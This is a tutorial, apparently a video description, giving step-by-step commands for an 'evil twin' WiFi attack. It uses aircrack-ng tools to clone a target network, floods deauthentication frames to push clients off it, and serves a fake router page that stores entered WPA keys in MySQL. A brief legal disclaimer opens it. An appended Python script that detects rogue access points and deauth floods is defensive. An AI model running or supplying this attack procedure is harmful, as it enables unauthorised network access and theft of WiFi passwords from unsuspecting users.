WPA/WPA2 exploitation with Aircrack (No Bruteforce): Evil Twin Method



"backtrack 5 r3"



Disclaimer: This video is for educational purposes only and is not intended to encourage the viewer to commit cybercrime. Hacking any WiFi which you do not own, or without explicit permission from the owner, is absolutely illegal. In this video I show how to set up a fake access point to obtain a WPA handshake and serve a fake website, so that whenever the client inputs the correct password the man in the middle also gathers the data.

CODES USED IN THE VIDEO:


apt-get install dhcp3-server -y
airmon-ng
airmon-ng start wlan0
airodump-ng mon0

Press Ctrl+C and select the target.


Open a new terminal and type this:
gedit /etc/dhcp3/dhcpd.conf

"When it opens" input all of this:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option routers 192.168.1.1;
option domain-name-servers 8.8.8.8;
range 192.168.1.2 192.168.1.254;
}


"Remember to save before opening a new terminal"

cd TP-Link/
ls
rm /var/www/index.html
cp error.html /var/www/
cp index.html /var/www/
cp savekey.php /var/www/
cp spanish-sky.jpg /var/www/
cp tp-link-logo.jpg /var/www/
cp update.html /var/www/
cp verizon.css /var/www/
ls /var/www/


"You can now close this terminal" and go back to the first terminal
("gedit /etc/dhcp3/dhcpd.conf")

Start the Apache server via Applications --> BackTrack --> Services --> HTTPD --> apache start,
then start MySQL via Applications --> BackTrack --> Services --> MySQLD --> mysql start.

"Don't close this", "Open a new terminal to create a new database in our MySQL server"

mysql -u root -p
create database NetworkKeys;
use NetworkKeys;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));


After this, you may close this terminal and go back to your previous terminal --> "gedit WPAHacking.sh"

"When it opens input this"

#!/bin/bash
# Bring up the at0 interface created by airbase-ng and give it the gateway address
ifconfig at0 up
ifconfig at0 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
# Reset any existing firewall rules
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
# Redirect all HTTP traffic to the web server (author's address; replace with your own)
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.254.107:80
iptables -t nat -A POSTROUTING -j MASQUERADE
# Enable forwarding before starting dhcpd: "dhcpd3 -f" stays in the foreground,
# so a line placed after it would not run until dhcpd exits
echo "1" > /proc/sys/net/ipv4/ip_forward
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0


"DON'T FORGET TO SAVE before closing" then go back to the "gedit terminal"
"Now we need to stop our interface and put it back up on the right channel"

airmon-ng
airmon-ng stop mon0
airmon-ng start wlan0 1    // "1 = channel of your target"
airodump-ng mon0

"Press ctrl+c to stop"

airbase-ng -e "[your target essid]" -c [channel of target] -a [fake mac 00:11:22:33:44:55] mon0

//Don't forget to replace the words in the square brackets with the corresponding values...

"execute the bash-script we created before like this"

bash WPAHacking.sh

"After this" open a new terminal to look for clients to de-authenticate on the network

airodump-ng -c [channel of target] mon0

"Press ctrl+c to stop"

aireplay-ng -0 0 -a [bssid target] -c [station/client mac target] mon0

"Now that the setup is done, sit back and wait for a client to connect to our access point." When one falls into the trap, we can go back to our MySQL database and type the commands below.

mysql -u root -p
use NetworkKeys;
select * from content;

Then we should have our WPA/WPA2 keys.
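The defender's side of the procedure above, as an added example that is not part of the original post: the two observable signs of this attack are a second BSSID beaconing a managed ESSID (the airbase-ng step) and a burst of deauthentication frames against the real access point (the aireplay-ng -0 step). The script below flags both from constructed scan records; the allowlist, the BSSIDs, the timestamps and the thresholds are all assumptions made up for the example, and in practice the records would be parsed from airodump-ng CSV output or a packet capture.

```python
"""Rogue-AP and deauth-flood detection over constructed wireless scan records.

Added example; not part of the original tutorial. All addresses and
timestamps below are constructed for illustration.
"""
from collections import defaultdict

# Constructed allowlist: the legitimate BSSID(s) for each ESSID we manage.
KNOWN_APS = {
    "TP-Link_Home": {"aa:bb:cc:dd:ee:01"},
}

# Constructed beacon observations: (essid, bssid, channel).
BEACONS = [
    ("TP-Link_Home", "aa:bb:cc:dd:ee:01", 1),
    ("TP-Link_Home", "aa:bb:cc:dd:ee:01", 1),
    ("TP-Link_Home", "00:11:22:33:44:55", 1),   # same name, unknown BSSID
    ("Neighbor_Net", "aa:bb:cc:dd:ee:99", 6),   # not ours, not checked
]

# Constructed deauthentication frames: (timestamp_seconds, bssid, station).
# 40 frames 50 ms apart against the real AP, plus one stray frame elsewhere.
DEAUTHS = [(i * 0.05, "aa:bb:cc:dd:ee:01", "de:ad:be:ef:00:01") for i in range(40)]
DEAUTHS.append((30.0, "aa:bb:cc:dd:ee:99", "de:ad:be:ef:00:02"))


def find_rogue_aps(beacons, known_aps):
    """Return sorted (essid, bssid) pairs where a managed ESSID is
    advertised by a BSSID that is not in the allowlist."""
    rogues = set()
    for essid, bssid, _channel in beacons:
        bssid = bssid.lower()
        if essid in known_aps and bssid not in known_aps[essid]:
            rogues.add((essid, bssid))
    return sorted(rogues)


def find_deauth_floods(deauths, window=1.0, threshold=10):
    """Return sorted BSSIDs that received more than `threshold` deauth
    frames within any `window`-second span (sliding window per BSSID)."""
    per_bssid = defaultdict(list)
    for ts, bssid, _station in deauths:
        per_bssid[bssid.lower()].append(ts)
    flooded = []
    for bssid, times in per_bssid.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Advance the window start until it spans at most `window` seconds.
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 > threshold:
                flooded.append(bssid)
                break
    return sorted(flooded)


if __name__ == "__main__":
    for essid, bssid in find_rogue_aps(BEACONS, KNOWN_APS):
        print(f"ROGUE AP: ESSID {essid!r} advertised by unknown BSSID {bssid}")
    for bssid in find_deauth_floods(DEAUTHS):
        print(f"DEAUTH FLOOD against {bssid}")
```

The two checks are deliberately independent: a rogue AP that never sends deauth frames still shows up in the first list, and a deauth flood against an AP whose ESSID is not in the allowlist still shows up in the second. Tune `window` and `threshold` to the normal deauth rate on your own network; a handful of legitimate deauths per second is common, but dozens against one BSSID is not.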





